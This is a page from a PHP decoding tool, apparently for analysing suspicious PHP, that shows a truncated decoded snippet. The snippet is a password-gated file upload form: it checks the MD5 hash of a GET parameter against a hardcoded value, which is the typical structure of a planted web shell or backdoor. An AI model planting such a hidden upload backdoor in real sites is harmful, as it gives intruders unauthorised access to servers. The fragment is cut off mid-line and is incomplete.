Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ?><?php if (!empty($_GET['s'])) { if (md5($_GET['s']) == '8855eb6091ae2c17e183..

Decoded Output download

<?php ?><?php 
if (!empty($_GET['s'])) { 
    if (md5($_GET['s']) == '8855eb6091ae2c17e183f9007da44d81') { 
        echo '<form action="" method="post" enctype="multipart/form-data"><input type="file" na ?>

Did this file decode correctly?

Original Code

<?php ?><?php
if (!empty($_GET['s'])) {
    if (md5($_GET['s']) == '8855eb6091ae2c17e183f9007da44d81') {
        echo '<form action="" method="post" enctype="multipart/form-data"><input type="file" na

Function Calls

None

Variables

None

Stats

MD5 81e8a8211706459422adee130f4d3853
Eval Count 0
Decode Time 98 ms